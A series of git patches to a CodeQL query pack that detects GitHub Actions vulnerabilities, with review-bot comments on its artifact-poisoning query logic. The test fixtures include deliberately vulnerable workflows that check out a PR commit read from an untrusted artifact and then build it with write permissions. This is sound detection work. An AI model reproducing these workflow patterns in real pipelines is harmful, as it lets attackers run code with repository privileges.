github.event.pull_request.title | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:6:7:6:11 | input taint | provenance | | 
@@ -170,7 +173,9 @@ nodes | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:6:7:6:11 | input taint | semmle.label | input taint | | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:36:21:36:39 | inputs.taint | semmle.label | inputs.taint | | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:44:19:44:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:45:24:45:61 | github.event.changes.title.from | semmle.label | github.event.changes.title.from | | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:53:26:53:39 | env.log | semmle.label | env.log | +| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:66:34:66:52 | env.prev_log | semmle.label | env.prev_log | | .github/workflows/argus_case_study.yml:15:9:24:6 | Uses Step: remove_quotations [replaced] | semmle.label | Uses Step: remove_quotations [replaced] | | .github/workflows/argus_case_study.yml:17:25:17:53 | github.event.issue.title | semmle.label | github.event.issue.title | | .github/workflows/argus_case_study.yml:22:20:22:39 | env.ISSUE_TITLE | semmle.label | env.ISSUE_TITLE | 
@@ -329,11 +334,15 @@ nodes | .github/workflows/reusable-workflow-1.yml:6:7:6:11 | input taint | semmle.label | input taint | | .github/workflows/reusable-workflow-1.yml:36:21:36:39 | inputs.taint | semmle.label | inputs.taint | | .github/workflows/reusable-workflow-1.yml:44:19:44:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/reusable-workflow-1.yml:45:24:45:61 | github.event.changes.title.from | semmle.label | github.event.changes.title.from | | .github/workflows/reusable-workflow-1.yml:53:26:53:39 | env.log | semmle.label | env.log | +| .github/workflows/reusable-workflow-1.yml:66:34:66:52 | env.prev_log | semmle.label | env.prev_log | | .github/workflows/reusable-workflow-2.yml:6:7:6:11 | input taint | semmle.label | input taint | | .github/workflows/reusable-workflow-2.yml:36:21:36:39 | inputs.taint | semmle.label | inputs.taint | | .github/workflows/reusable-workflow-2.yml:44:19:44:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/reusable-workflow-2.yml:45:24:45:61 | github.event.changes.title.from | semmle.label | github.event.changes.title.from | | .github/workflows/reusable-workflow-2.yml:53:26:53:39 | env.log | semmle.label | env.log | +| .github/workflows/reusable-workflow-2.yml:66:34:66:52 | env.prev_log | semmle.label | env.prev_log | | .github/workflows/reusable-workflow-caller-1.yml:11:15:11:52 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | | .github/workflows/reusable-workflow-caller-2.yml:10:15:10:52 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | | .github/workflows/reusable-workflow-caller-3.yml:10:15:10:52 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | 
@@ -403,6 +412,10 @@ nodes | .github/workflows/test11.yml:54:20:54:60 | needs.get-artifacts.outputs.pr_num | semmle.label | needs.get-artifacts.outputs.pr_num | | .github/workflows/test11.yml:55:20:55:57 | needs.get-artifacts.outputs.ref | semmle.label | needs.get-artifacts.outputs.ref | | .github/workflows/test12.yml:10:21:10:67 | github.event.pull_request.title \|\| "foo" | semmle.label | github.event.pull_request.title \|\| "foo" | +| .github/workflows/test13.yml:10:21:10:57 | github.event.changes.body.from | semmle.label | github.event.changes.body.from | +| .github/workflows/test13.yml:11:21:11:58 | github.event.changes.title.from | semmle.label | github.event.changes.title.from | +| .github/workflows/test13.yml:12:21:12:61 | github.event.changes.head.ref.from | semmle.label | github.event.changes.head.ref.from | +| .github/workflows/test13.yml:13:21:13:55 | toJson(github.event.changes) | semmle.label | toJson(github.event.changes) | | .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | | .github/workflows/test.yml:8:20:8:50 | steps.step5.outputs.MSG5 | semmle.label | steps.step5.outputs.MSG5 | | .github/workflows/test.yml:12:9:18:6 | Uses Step: step0 [value] | semmle.label | Uses Step: step0 [value] | 
@@ -466,6 +479,7 @@ subpaths | .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | ${{ github.event.commits[11].committer.name }} | | .github/workflows/reusable-workflow-1.yml:36:21:36:39 | inputs.taint | .github/workflows/reusable-workflow-caller-1.yml:11:15:11:52 | github.event.pull_request.title | .github/workflows/reusable-workflow-1.yml:36:21:36:39 | inputs.taint | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/reusable-workflow-1.yml:36:21:36:39 | inputs.taint | ${{ inputs.taint }} | | .github/workflows/reusable-workflow-1.yml:53:26:53:39 | env.log | .github/workflows/reusable-workflow-1.yml:44:19:44:56 | github.event.pull_request.title | .github/workflows/reusable-workflow-1.yml:53:26:53:39 | env.log | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/reusable-workflow-1.yml:53:26:53:39 | env.log | ${{ env.log }} | +| .github/workflows/reusable-workflow-1.yml:66:34:66:52 | env.prev_log | .github/workflows/reusable-workflow-1.yml:45:24:45:61 | github.event.changes.title.from | .github/workflows/reusable-workflow-1.yml:66:34:66:52 | env.prev_log | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/reusable-workflow-1.yml:66:34:66:52 | env.prev_log | ${{ env.prev_log }} | | .github/workflows/simple1.yml:16:18:16:49 | steps.summary.outputs.value | .github/workflows/simple1.yml:11:20:11:58 | github.event.head_commit.message | .github/workflows/simple1.yml:16:18:16:49 | steps.summary.outputs.value | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/simple1.yml:16:18:16:49 | steps.summary.outputs.value | ${{steps.summary.outputs.value}} | | .github/workflows/test10.yml:57:34:57:77 | github.event.workflow_run.head_branch | .github/workflows/test10.yml:57:34:57:77 | github.event.workflow_run.head_branch | .github/workflows/test10.yml:57:34:57:77 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test10.yml:57:34:57:77 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | | .github/workflows/test10.yml:147:34:147:77 | github.event.workflow_run.head_branch | .github/workflows/test10.yml:147:34:147:77 | github.event.workflow_run.head_branch | .github/workflows/test10.yml:147:34:147:77 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test10.yml:147:34:147:77 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | From 71960b3ddd80a3686a9912d4650fc33e13507680 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 25 Sep 2024 18:22:46 +0200 Subject: [PATCH 0541/1267] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index ecde4c83b20..dc2e1b8e71d 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml 
@@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: github/actions-all -version: 0.1.54 +version: 0.1.55 dependencies: codeql/util: ^1.0.1 codeql/yaml: ^1.0.1 diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index cddb4f61bf6..313c90a1423 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: github/actions-queries -version: 0.1.54 +version: 0.1.55 groups: [actions, queries] suites: codeql-suites extractor: javascript From 010ad359d7059cbe357a129b26fb237a5cb2fd70 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 27 Sep 2024 10:28:44 +0200 Subject: [PATCH 0542/1267] Add new sources and summary steps --- ql/lib/ext/manual/AsasInnab_regex-action.model.yml | 6 ++++++ ql/lib/ext/manual/MeilCli_regex-match.model.yml | 8 ++++++++ .../manual/actions-ecosystem_action-regex-match.model.yml | 6 ++++++ .../manual/dsfx3d_action-extract-unique-matches.model.yml | 6 ++++++ ql/lib/ext/manual/kaisugi_action-regex-match.model.yml | 7 +++++++ .../manual/paulschuberth_regex-extract-action.model.yml | 7 +++++++ ql/lib/ext/manual/release-kit_regex.model.yml | 7 +++++++ ql/lib/ext/manual/tim-actions_get-pr-commits.model.yml | 7 +++++++ .../ext/manual/tmelliottjr_extract-regex-action.model.yml | 8 ++++++++ 9 files changed, 62 insertions(+) create mode 100644 ql/lib/ext/manual/AsasInnab_regex-action.model.yml create mode 100644 ql/lib/ext/manual/MeilCli_regex-match.model.yml create mode 100644 ql/lib/ext/manual/actions-ecosystem_action-regex-match.model.yml create mode 100644 ql/lib/ext/manual/dsfx3d_action-extract-unique-matches.model.yml create mode 100644 ql/lib/ext/manual/kaisugi_action-regex-match.model.yml create mode 100644 ql/lib/ext/manual/paulschuberth_regex-extract-action.model.yml create mode 100644 ql/lib/ext/manual/release-kit_regex.model.yml create mode 100644 ql/lib/ext/manual/tim-actions_get-pr-commits.model.yml create mode 100644 ql/lib/ext/manual/tmelliottjr_extract-regex-action.model.yml 
diff --git a/ql/lib/ext/manual/AsasInnab_regex-action.model.yml b/ql/lib/ext/manual/AsasInnab_regex-action.model.yml new file mode 100644 index 00000000000..2efaefb95b6 --- /dev/null +++ b/ql/lib/ext/manual/AsasInnab_regex-action.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: github/actions-all + extensible: actionsSummaryModel + data: + - ["AsasInnab/regex-action", "*", "input.search_string", "output.first_match", "taint", "manual"] diff --git a/ql/lib/ext/manual/MeilCli_regex-match.model.yml b/ql/lib/ext/manual/MeilCli_regex-match.model.yml new file mode 100644 index 00000000000..74a0f43fd91 --- /dev/null +++ b/ql/lib/ext/manual/MeilCli_regex-match.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: github/actions-all + extensible: actionsSummaryModel + data: + - ["MeilCli/regex-match", "*", "input.search_string", "output.matched_first", "taint", "manual"] + - ["MeilCli/regex-match", "*", "input.search_string", "output.matched_json", "taint", "manual"] + diff --git a/ql/lib/ext/manual/actions-ecosystem_action-regex-match.model.yml b/ql/lib/ext/manual/actions-ecosystem_action-regex-match.model.yml new file mode 100644 index 00000000000..edc9585b548 --- /dev/null +++ b/ql/lib/ext/manual/actions-ecosystem_action-regex-match.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: github/actions-all + extensible: actionsSummaryModel + data: + - ["actions-ecosystem/action-regex-match", "*", "input.text", "output.*", "taint", "manual"] diff --git a/ql/lib/ext/manual/dsfx3d_action-extract-unique-matches.model.yml b/ql/lib/ext/manual/dsfx3d_action-extract-unique-matches.model.yml new file mode 100644 index 00000000000..226a151daba --- /dev/null +++ b/ql/lib/ext/manual/dsfx3d_action-extract-unique-matches.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: github/actions-all + extensible: actionsSummaryModel + data: + - ["dsfx3d/action-extract-unique-matches", "*", "input.text", "output.matches", "taint", "manual"] 
diff --git a/ql/lib/ext/manual/kaisugi_action-regex-match.model.yml b/ql/lib/ext/manual/kaisugi_action-regex-match.model.yml new file mode 100644 index 00000000000..3e646e4482f --- /dev/null +++ b/ql/lib/ext/manual/kaisugi_action-regex-match.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: github/actions-all + extensible: actionsSummaryModel + data: + - ["kaisugi/action-regex-match", "*", "input.text", "output.*", "taint", "manual"] + diff --git a/ql/lib/ext/manual/paulschuberth_regex-extract-action.model.yml b/ql/lib/ext/manual/paulschuberth_regex-extract-action.model.yml new file mode 100644 index 00000000000..d1d930168dc --- /dev/null +++ b/ql/lib/ext/manual/paulschuberth_regex-extract-action.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: github/actions-all + extensible: actionsSummaryModel + data: + - ["paulschuberth/regex-extract-action", "*", "input.haystack", "output.matches", "taint", "manual"] + diff --git a/ql/lib/ext/manual/release-kit_regex.model.yml b/ql/lib/ext/manual/release-kit_regex.model.yml new file mode 100644 index 00000000000..5b2e5d9c4eb --- /dev/null +++ b/ql/lib/ext/manual/release-kit_regex.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: github/actions-all + extensible: actionsSummaryModel + data: + - ["release-kit/regex", "*", "input.string", "output.*", "taint", "manual"] + diff --git a/ql/lib/ext/manual/tim-actions_get-pr-commits.model.yml b/ql/lib/ext/manual/tim-actions_get-pr-commits.model.yml new file mode 100644 index 00000000000..a0dfb648875 --- /dev/null +++ b/ql/lib/ext/manual/tim-actions_get-pr-commits.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: github/actions-all + extensible: actionsSourceModel + data: + - ["tim-actions/get-pr-commits", "*", "output.commits", "text", "manual"] + diff --git a/ql/lib/ext/manual/tmelliottjr_extract-regex-action.model.yml b/ql/lib/ext/manual/tmelliottjr_extract-regex-action.model.yml new file mode 100644 index 00000000000..73fd66c11b9 --- /dev/null 
+++ b/ql/lib/ext/manual/tmelliottjr_extract-regex-action.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: github/actions-all + extensible: actionsSummaryModel + data: + - ["tmelliottjr/extract-regex-action", "*", "input.input", "output.resultString", "taint", "manual"] + - ["tmelliottjr/extract-regex-action", "*", "input.input", "output.resultArray", "taint", "manual"] + From 26f829eff4888306fe190c666a4f4b889538650b Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 27 Sep 2024 10:29:47 +0200 Subject: [PATCH 0543/1267] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index dc2e1b8e71d..8447d10d94b 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: github/actions-all -version: 0.1.55 +version: 0.1.56 dependencies: codeql/util: ^1.0.1 codeql/yaml: ^1.0.1 diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index 313c90a1423..b167a960886 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: github/actions-queries -version: 0.1.55 +version: 0.1.56 groups: [actions, queries] suites: codeql-suites extractor: javascript From 86c1d9c30f9b777e03d7a863b48145a06ecb33d5 Mon Sep 17 00:00:00 2001 
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 27 Sep 2024 12:35:10 +0200 Subject: [PATCH 0544/1267] Improve artifact poisoning query Better check of download path Add downloading to /tmp as a sanitizer --- .../codeql/actions/dataflow/FlowSources.qll | 2 +- ql/lib/codeql/actions/dataflow/FlowSteps.qll | 3 +- .../security/ArtifactPoisoningQuery.qll | 68 +++++++++++-------- .../actions/download-artifact-2/action.yaml | 32 +++++++++ .../actions/download-artifact/action.yaml | 32 +++++++++ .../.github/workflows/artifactpoisoning91.yml | 29 ++++++++ .../.github/workflows/artifactpoisoning92.yml | 29 ++++++++ .../ArtifactPoisoningCritical.expected | 11 +++ .../CWE-829/ArtifactPoisoningMedium.expected | 9 +++ .../UntrustedCheckoutCritical.expected | 18 +++++ 10 files changed, 200 insertions(+), 33 deletions(-) create mode 100644 ql/test/query-tests/Security/CWE-829/.github/actions/download-artifact-2/action.yaml create mode 100644 ql/test/query-tests/Security/CWE-829/.github/actions/download-artifact/action.yaml create mode 100644 ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning91.yml create mode 100644 ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning92.yml diff --git a/ql/lib/codeql/actions/dataflow/FlowSources.qll b/ql/lib/codeql/actions/dataflow/FlowSources.qll index ce211584749..4682e7b1abf 100644 --- a/ql/lib/codeql/actions/dataflow/FlowSources.qll +++ b/ql/lib/codeql/actions/dataflow/FlowSources.qll @@ -107,7 +107,7 @@ class MaDSource extends RemoteFlowSource { /** * A downloaded artifact. */ -private class ArtifactSource extends RemoteFlowSource { +class ArtifactSource extends RemoteFlowSource { ArtifactSource() { this.asExpr() instanceof UntrustedArtifactDownloadStep } override string getSourceType() { result = "artifact" } diff --git a/ql/lib/codeql/actions/dataflow/FlowSteps.qll b/ql/lib/codeql/actions/dataflow/FlowSteps.qll index 9ca17eb4dab..4b8cff4f428 100644 --- a/ql/lib/codeql/actions/dataflow/FlowSteps.qll 
+++ b/ql/lib/codeql/actions/dataflow/FlowSteps.qll @@ -263,12 +263,11 @@ predicate artifactDownloadToRunStep(DataFlow::Node pred, DataFlow::Node succ) { // /** - * A download artifact step followed by a envvar-injection uses step . + * A download artifact step followed by a uses step . */ predicate artifactDownloadToUsesStep(DataFlow::Node pred, DataFlow::Node succ) { exists(Step artifact, Uses uses | controlledCWD(artifact) and - madSink(succ, "envvar-injection") and pred.asExpr() = artifact and succ.asExpr() = uses and artifact.getAFollowingStep() = uses diff --git a/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll b/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll index 6881caccd52..236cc4d8091 100644 --- a/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll +++ b/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll @@ -7,10 +7,7 @@ import codeql.actions.security.PoisonableSteps string unzipRegexp() { result = ".*(unzip|tar)\\s+.*" } -string unzipDirArgRegexp() { - result = "-d\\s+\"([^ ]+)\".*" or - result = "-d\\s+'([^ ]+)'.*" -} +string unzipDirArgRegexp() { result = "-d\\s+([^ ]+).*" } abstract class UntrustedArtifactDownloadStep extends Step { abstract string getPath(); @@ -164,11 +161,11 @@ class ActionsGitHubScriptDownloadStep extends UntrustedArtifactDownloadStep, Use .regexpMatch(unzipRegexp() + unzipDirArgRegexp()) then result = - this.getAFollowingStep() - .(Run) - .getScript() - .splitAt("\n") - .regexpCapture(unzipRegexp() + unzipDirArgRegexp(), 2) + trimQuotes(this.getAFollowingStep() + .(Run) + .getScript() + .splitAt("\n") + .regexpCapture(unzipRegexp() + unzipDirArgRegexp(), 2)) else if this.getAFollowingStep().(Run).getScript().splitAt("\n").regexpMatch(unzipRegexp()) then result = "" 
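Review bot: The updated doc comment on `artifactDownloadToUsesStep` no longer says what gates the step. With `madSink(succ, "envvar-injection")` removed, every `Uses` step that follows a download satisfying `controlledCWD(artifact)` becomes a flow successor. The comment should name that remaining condition, for example `* A download artifact step that controls the working directory, followed by any later uses step.` The change also widens the set of reported paths, so confirm the added `.expected` rows are findings you want rather than noise. The predicate's closing lines fall outside this hunk.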
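Review bot: The relaxed `unzipDirArgRegexp()` (`-d\\s+([^ ]+).*`) stops at the first space, so a quoted directory containing a space now matches and yields a truncated path. The old quoted alternatives did not match that case at all. `unzipRegexp()` also accepts `tar`, which names its extraction directory with `-C`, so this pattern never captures a tar target. Both limits now matter more, because the `getPath()` callers in the `@@ -164`, `@@ -199` and `@@ -245` hunks feed the sink's path comparison and its `/tmp` exclusion. I would document them on the predicate, e.g. `// Captures the unzip "-d <dir>" argument up to the first space; quotes are stripped by the caller. tar's -C is not recognised.` `trimQuotes` is not defined in the visible hunks, so check that it strips both quote styles.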
@@ -199,13 +196,14 @@ class GHRunArtifactDownloadStep extends UntrustedArtifactDownloadStep, Run { .regexpMatch(unzipRegexp() + unzipDirArgRegexp()) or script.splitAt("\n").regexpMatch(unzipRegexp() + unzipDirArgRegexp()) then - result = script.splitAt("\n").regexpCapture(unzipRegexp() + unzipDirArgRegexp(), 2) or result = - this.getAFollowingStep() - .(Run) - .getScript() - .splitAt("\n") - .regexpCapture(unzipRegexp() + unzipDirArgRegexp(), 2) + trimQuotes(script.splitAt("\n").regexpCapture(unzipRegexp() + unzipDirArgRegexp(), 2)) or + result = + trimQuotes(this.getAFollowingStep() + .(Run) + .getScript() + .splitAt("\n") + .regexpCapture(unzipRegexp() + unzipDirArgRegexp(), 2)) else if this.getAFollowingStep().(Run).getScript().splitAt("\n").regexpMatch(unzipRegexp()) or 
@@ -245,37 +243,47 @@ class DirectArtifactDownloadStep extends UntrustedArtifactDownloadStep, Run { .splitAt("\n") .regexpMatch(unzipRegexp() + unzipDirArgRegexp()) then - result = script.splitAt("\n").regexpCapture(unzipRegexp() + unzipDirArgRegexp(), 2) or result = - this.getAFollowingStep() - .(Run) - .getScript() - .splitAt("\n") - .regexpCapture(unzipRegexp() + unzipDirArgRegexp(), 2) + trimQuotes(script.splitAt("\n").regexpCapture(unzipRegexp() + unzipDirArgRegexp(), 2)) or + result = + trimQuotes(this.getAFollowingStep() + .(Run) + .getScript() + .splitAt("\n") + .regexpCapture(unzipRegexp() + unzipDirArgRegexp(), 2)) else result = "" } } class ArtifactPoisoningSink extends DataFlow::Node { + UntrustedArtifactDownloadStep download; + PoisonableStep poisonable; + ArtifactPoisoningSink() { - exists(UntrustedArtifactDownloadStep download, PoisonableStep poisonable | - download.getAFollowingStep() = poisonable and - ( - poisonable.(Run).getScriptScalar() = this.asExpr() - or - poisonable.(UsesStep) = this.asExpr() - ) and + download.getAFollowingStep() = poisonable and + // excluding artifacts downloaded to /tmp + not download.getPath().regexpMatch("^/tmp.*") and + ( + poisonable.(Run).getScriptScalar() = this.asExpr() and ( // Check if the poisonable step is a local script execution step // and the path of the command or script matches the path of the downloaded artifact - not poisonable instanceof LocalScriptExecutionRunStep or + // Checking the path for non local script execution steps is very difficult + not poisonable instanceof LocalScriptExecutionRunStep + or + // TODO: account for Run's working directory poisonable .(LocalScriptExecutionRunStep) .getCommand() .matches(["./", ""] + download.getPath() + "%") ) + or + poisonable.(UsesStep) = this.asExpr() and + download.getPath() = "" ) } + + string getPath() { result = download.getPath() } } /** 
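Review bot: The new exclusion `not download.getPath().regexpMatch("^/tmp.*")` in `ArtifactPoisoningSink` is a bare prefix test. A path such as `/tmpfoo`, or one that climbs back out with `/tmp/../`, is treated as outside the workspace and the finding is silently dropped. Anchoring to a path segment and refusing parent-directory segments keeps the sanitizer from hiding real results: `not (download.getPath().regexpMatch("/tmp(/.*)?") and not download.getPath().matches("%..%"))`. In the same class, `poisonable.(UsesStep) = this.asExpr() and download.getPath() = ""` only treats a `uses` step as a sink when the path is exactly empty. Whether `getPath()` can return `.` or `./` for a workspace-root download is not visible here and is worth confirming. The hunk opens inside `DirectArtifactDownloadStep.getPath()`, whose start is outside the hunk.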
@@ -283,7 +291,7 @@ class ArtifactPoisoningSink extends DataFlow::Node { * that is used may lead to artifact poisoning */ private module ArtifactPoisoningConfig implements DataFlow::ConfigSig { - predicate isSource(DataFlow::Node source) { source instanceof RemoteFlowSource } + predicate isSource(DataFlow::Node source) { source instanceof ArtifactSource } predicate isSink(DataFlow::Node sink) { sink instanceof ArtifactPoisoningSink } } diff --git a/ql/test/query-tests/Security/CWE-829/.github/actions/download-artifact-2/action.yaml b/ql/test/query-tests/Security/CWE-829/.github/actions/download-artifact-2/action.yaml new file mode 100644 index 00000000000..4241647d3e1 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-829/.github/actions/download-artifact-2/action.yaml @@ -0,0 +1,32 @@ +name: DownloadArtifacts +description: 'Downloads and unarchives artifacts for a workflow that runs on workflow_run so that it can use its data' +runs: + using: "composite" + steps: + - uses: actions/github-script@60a0d83039c74a4aee543508d2ffcb1c3799cdea # v7.0.1 + with: + script: | + let allArtifacts = await github.rest.actions.listWorkflowRunArtifacts({ + owner: context.repo.owner, + repo: context.repo.repo, + run_id: context.payload.workflow_run.id, + }); + let matchArtifact = allArtifacts.data.artifacts.filter((artifact) => { + return artifact.name == "artifacts" + })[0]; + let download = await github.rest.actions.downloadArtifact({ + owner: context.repo.owner, + repo: context.repo.repo, + artifact_id: matchArtifact.id, + archive_format: 'zip', + }); + let fs = require('fs'); + fs.writeFileSync(`/tmp/artifacts.zip`, Buffer.from(download.data)); + - run: | + mkdir -p /tmp/artifacts + unzip /tmp/artifacts.zip + shell: bash + - run: | + echo "Downloaded artifacts:" + ls -ablh + shell: bash 
diff --git a/ql/test/query-tests/Security/CWE-829/.github/actions/download-artifact/action.yaml b/ql/test/query-tests/Security/CWE-829/.github/actions/download-artifact/action.yaml new file mode 100644 index 00000000000..0c205952102 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-829/.github/actions/download-artifact/action.yaml @@ -0,0 +1,32 @@ +name: DownloadArtifacts +description: 'Downloads and unarchives artifacts for a workflow that runs on workflow_run so that it can use its data' +runs: + using: "composite" + steps: + - uses: actions/github-script@60a0d83039c74a4aee543508d2ffcb1c3799cdea # v7.0.1 + with: + script: | + let allArtifacts = await github.rest.actions.listWorkflowRunArtifacts({ + owner: context.repo.owner, + repo: context.repo.repo, + run_id: context.payload.workflow_run.id, + }); + let matchArtifact = allArtifacts.data.artifacts.filter((artifact) => { + return artifact.name == "artifacts" + })[0]; + let download = await github.rest.actions.downloadArtifact({ + owner: context.repo.owner, + repo: context.repo.repo, + artifact_id: matchArtifact.id, + archive_format: 'zip', + }); + let fs = require('fs'); + fs.writeFileSync(`/tmp/artifacts.zip`, Buffer.from(download.data)); + - run: | + mkdir -p /tmp/artifacts + unzip /tmp/artifacts.zip -d /tmp/artifacts + shell: bash + - run: | + echo "Downloaded artifacts:" + ls -ablh /tmp/artifacts + shell: bash diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning91.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning91.yml new file mode 100644 index 00000000000..af9f01b572f --- /dev/null +++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning91.yml 
@@ -0,0 +1,29 @@ +name: SnapshotPR +on: + workflow_run: + workflows: + - ApprovalComment + types: + - completed +jobs: + snapshot: + permissions: + id-token: write + pull-requests: write + statuses: write + if: github.event.workflow_run.conclusion == 'success' + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@9bb56186c3b09b4f86b1c65136769dd318469633 # v4.1.2 + - uses: ./.github/actions/download-artifact + - id: metadata + run: | + pr_number="$(head -n 2 /tmp/artifacts/metadata.txt | tail -n 1)" + pr_commit="$(tail -n 1 /tmp/artifacts/metadata.txt)" + echo PR_COMMIT="$pr_commit" >> "$GITHUB_ENV" + echo PR_NUMBER="$pr_number" >> "$GITHUB_ENV" + - uses: actions/checkout@9bb56186c3b09b4f86b1c65136769dd318469633 # v4.1.2 + with: + ref: ${{ env.PR_COMMIT }} + - uses: ./.github/actions/install-deps + - run: make snapshot diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning92.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning92.yml new file mode 100644 index 00000000000..e35bc73c3bd --- /dev/null +++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning92.yml @@ -0,0 +1,29 @@ +name: SnapshotPR +on: + workflow_run: + workflows: + - ApprovalComment + types: + - completed +jobs: + snapshot: + permissions: + id-token: write + pull-requests: write + statuses: write + if: github.event.workflow_run.conclusion == 'success' + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@9bb56186c3b09b4f86b1c65136769dd318469633 # v4.1.2 + - uses: ./.github/actions/download-artifact-2 + - id: metadata + run: | + pr_number="$(head -n 2 /tmp/artifacts/metadata.txt | tail -n 1)" + pr_commit="$(tail -n 1 /tmp/artifacts/metadata.txt)" + echo PR_COMMIT="$pr_commit" >> "$GITHUB_ENV" + echo PR_NUMBER="$pr_number" >> "$GITHUB_ENV" + - uses: actions/checkout@9bb56186c3b09b4f86b1c65136769dd318469633 # v4.1.2 + with: + ref: ${{ env.PR_COMMIT }} + - uses: ./.github/actions/install-deps + - run: make snapshot 
diff --git a/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningCritical.expected b/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningCritical.expected index 11c6b98dc87..74edee72f5f 100644 --- a/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningCritical.expected +++ b/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningCritical.expected @@ -1,4 +1,7 @@ edges +| .github/actions/download-artifact-2/action.yaml:6:7:25:4 | Uses Step | .github/workflows/artifactpoisoning92.yml:25:9:28:6 | Uses Step | provenance | | +| .github/actions/download-artifact-2/action.yaml:6:7:25:4 | Uses Step | .github/workflows/artifactpoisoning92.yml:28:9:29:6 | Uses Step | provenance | | +| .github/actions/download-artifact-2/action.yaml:6:7:25:4 | Uses Step | .github/workflows/artifactpoisoning92.yml:29:14:29:26 | make snapshot | provenance | | | .github/workflows/artifactpoisoning11.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning11.yml:38:11:38:77 | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | provenance | | | .github/workflows/artifactpoisoning12.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning12.yml:38:11:38:25 | python foo/x.py | provenance | | | .github/workflows/artifactpoisoning21.yml:13:9:18:6 | Uses Step | .github/workflows/artifactpoisoning21.yml:19:14:20:21 | sh foo/cmd\n | provenance | | 
